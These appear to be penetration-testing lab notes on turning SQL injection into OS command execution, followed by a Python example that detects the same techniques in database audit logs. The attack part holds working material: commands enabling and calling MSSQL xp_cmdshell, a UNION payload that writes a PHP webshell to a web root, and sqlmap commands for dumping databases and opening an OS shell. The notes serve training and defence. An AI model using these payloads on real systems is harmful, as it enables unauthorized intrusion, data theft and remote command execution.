Manual & Automated Code Execution
Using SQLi to run OS Commands
https://null-byte.wonderhowto.com/how-to/use-sql-injection-run-os-commands-get-shell-0191405/
10.3.1 - Manual code execution
MSSQL - Enable xp_cmdshell
impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXECUTE xp_cmdshell 'whoami';
MySQL - Write webshell to disk via INTO OUTFILE directive
The target directory must be writable by the OS user the database service runs as.
' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //
The webshell should then be reachable via a URL similar to:
192.168.50.1/tmp/webshell.php?cmd=id
10.3.2 - Automating the attack - SQLMap
Do not use this on OSCP machines.
Quickly test for SQL injection points: set the URL with -u and the parameter to test with -p
sqlmap -u "http://192.168.50.19/blindsqli.php?user=1" -p user
Dump the entire database
sqlmap -u "http://192.168.50.19/blindsqli.php?user=1" -p user --dump
Database & Table Enumeration - SQLMap
The following tests the id parameter of a potentially SQLi-vulnerable URL in non-interactive (batch) mode, so sqlmap uses the default answer to every prompt. This is useful for scripting and automation.
sqlmap -u "http://192.168.218.162:55743/th4o4p/admin_pay.php?action=del&id=1" -p id --batch
If it finds an injection point, list the available databases.
sqlmap -u "http://192.168.218.162:55743/th4o4p/admin_pay.php?action=del&id=1" -p id --batch --dbs
Specify one of the listed databases and enumerate its tables.
sqlmap -u "http://192.168.218.162:55743/th4o4p/admin_pay.php?action=del&id=1" -p id --batch -D seacms --tables
Then dump information from interesting ones.
sqlmap -u "http://192.168.218.162:55743/th4o4p/admin_pay.php?action=del&id=1" -p id --batch -D seacms -T sea_admin --dump
OS command shell using SQLMap
First intercept a POST request and save it to a local text file on Kali.
POST /search.php HTTP/1.1
Host: 192.168.50.19
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 9
Origin: http://192.168.50.19
Connection: close
Referer: http://192.168.50.19/search.php
Cookie: PHPSESSID=vchu1sfs34oosl52l7pb1kag7d
Upgrade-Insecure-Requests: 1
item=test
Pass the file containing the POST request with -r:
sqlmap -r post.txt -p item --os-shell --web-root "/var/www/html/tmp"
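From the defender's side, the primitives in these notes (enabling and calling xp_cmdshell, INTO OUTFILE writes of a script into a web root, which is also the file-write the --web-root option above depends on) show up in database query auditing. The following is an added Python example, not from the original notes or from sqlmap, that flags them in constructed audit lines; the audit line format and the web-root list are assumptions.

```python
import re

# Query-text patterns for the SQLi-to-OS-command primitives in the notes above:
# (engine, compiled pattern, base severity, reason).
RCE_PRIMITIVES = [
    ("mssql", re.compile(r"\bsp_configure\s+['\"]xp_cmdshell['\"]\s*,\s*1\b", re.I),
     "high", "xp_cmdshell enabled via sp_configure"),
    ("mssql", re.compile(r"\bEXEC(?:UTE)?\s+(?:master\.(?:dbo\.)?|master\.\.)?xp_cmdshell\b", re.I),
     "critical", "xp_cmdshell invoked"),
    ("mysql", re.compile(r"\bINTO\s+(?:OUT|DUMP)FILE\s+['\"](?P<path>[^'\"]+)['\"]", re.I),
     "medium", "file written to disk via INTO OUTFILE/DUMPFILE"),
]

# Directories the web server executes scripts from (assumed for this example);
# a database write of a script file into one of these is a webshell drop.
WEB_ROOTS = ("/var/www/", "c:\\inetpub\\wwwroot\\")
SCRIPT_EXTENSIONS = (".php", ".asp", ".aspx", ".jsp")


def analyse_query(line_no, query):
    # Returns one (line_no, engine, severity, reason) tuple per primitive found.
    findings = []
    for engine, pattern, severity, reason in RCE_PRIMITIVES:
        m = pattern.search(query)
        if not m:
            continue
        if "path" in pattern.groupindex:
            path = m.group("path").lower()
            # Escalate when the written file is a script inside a web root.
            if path.startswith(WEB_ROOTS) and path.endswith(SCRIPT_EXTENSIONS):
                severity, reason = "critical", "webshell written to web root: " + path
        findings.append((line_no, engine, severity, reason))
    return findings


def scan_audit_log(text):
    # Assumed audit format: '<timestamp> <connection-id> <statement>' per line.
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        parts = line.split(maxsplit=2)
        if len(parts) == 3:
            findings.extend(analyse_query(line_no, parts[2]))
    return findings


# Constructed sample: two benign statements, then the primitives from the notes.
SAMPLE_AUDIT = """\
2024-01-10T12:00:01Z 12 SELECT id, name FROM products WHERE id = 7
2024-01-10T12:00:05Z 12 SELECT id FROM products WHERE id = 7 UNION SELECT "<?php ... ?>", null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //
2024-01-10T12:00:09Z 13 SELECT * INTO OUTFILE '/tmp/export.csv' FROM orders
2024-01-10T12:01:00Z 14 EXECUTE sp_configure 'xp_cmdshell', 1
2024-01-10T12:01:02Z 14 EXECUTE xp_cmdshell 'whoami'
"""

for line_no, engine, severity, reason in scan_audit_log(SAMPLE_AUDIT):
    print(f"line {line_no} [{engine}] {severity.upper()}: {reason}")
```

A plain export to /tmp is only flagged as medium, so the rule separates legitimate INTO OUTFILE use from a script dropped under the web root.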